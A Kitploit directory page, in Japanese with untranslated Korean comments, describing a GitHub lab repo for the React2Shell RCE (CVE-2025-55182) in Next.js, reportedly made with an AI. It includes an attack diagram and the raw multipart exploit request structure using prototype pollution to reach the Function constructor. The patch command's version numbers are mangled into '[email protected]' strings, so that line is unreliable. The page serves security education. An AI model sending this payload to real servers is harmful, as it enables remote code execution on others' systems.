Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react-rce — CVE-2025-55182 の脆弱性に関するサンプルを AI と共に作成・テストしました。 | Kitploit
ツール/GitHubGitHub/randarts/react-rce
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用学習と教育ペイロード開発ラボと実践
GitHubrandarts/react-rce

react-rce

CVE-2025-55182 の脆弱性に関するサンプルを AI と共に作成・テストしました。

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 React2Shell 脆弱性演習

使用された AI : Claude Opus 4.5 ⚠️ 警告: この環境は教育および研究目的でのみ使用してください。

脆弱性の概要

項目内容
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
名前React2Shell
CVSS10.0 (Critical)
タイプPre-Auth Remote Code Execution
原因Flight プロトコルの逆シリアル化時のプロトタイプ汚染

攻撃の原理

root@kitploit:~
                    ┌─────────────────────────┐
                    │     Attacker            │
                    └───────────┬─────────────┘
                                │
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action 헤더 → Server Action 트리거                  │
│  2. multipart 페이로드 → Flight 프로토콜 역직렬화                │
│  3. Fake Chunk 객체의 then() 메서드 호출                       │
│  4. __proto__ 참조 → 프로토타입 오염                           │
│  5. Function 생성자 주입 → RCE                               │
└───────────────────────────────────────────────────────────┘

エクスプロイトペイロードの構造

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

主な要素:

  • Next-Action ヘッダーで Server Action をトリガー
  • Field 0: Promise ライクな動作のための then メソッドを持つ Fake Chunk
  • Field 1: $@0 参照でプロトタイプチェーンを走査
  • __proto__:then を介して Function コンストラクタにアクセス

クイックスタート

root@kitploit:~
cd vulnerable-app

# 의존성 설치
npm install

# 개발 서버 시작
npm run dev

http://localhost:3000 にアクセス


ディレクトリ構造

root@kitploit:~
react-rce/
├── README.md
├── vulnerable-app/          # 취약한 Next.js 앱
│   ├── package.json         # Next.js 15.0.3 (취약 버전)
│   └── app/
│       ├── page.js          # UI (CVE 정보 + RCE 시연)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # 공격 도구 (선택)
    └── exploit.py           # CVE-2025-55182 PoC

影響を受けるバージョン

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router 使用時)
  • パッケージ: react-server-dom-webpack, react-server-dom-turbopack

防御方法

root@kitploit:~
# 패치 버전으로 업그레이드
npm install [email protected] [email protected] [email protected]

参考

  • Next.js セキュリティアドバイザリ
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
ツールをダウンロード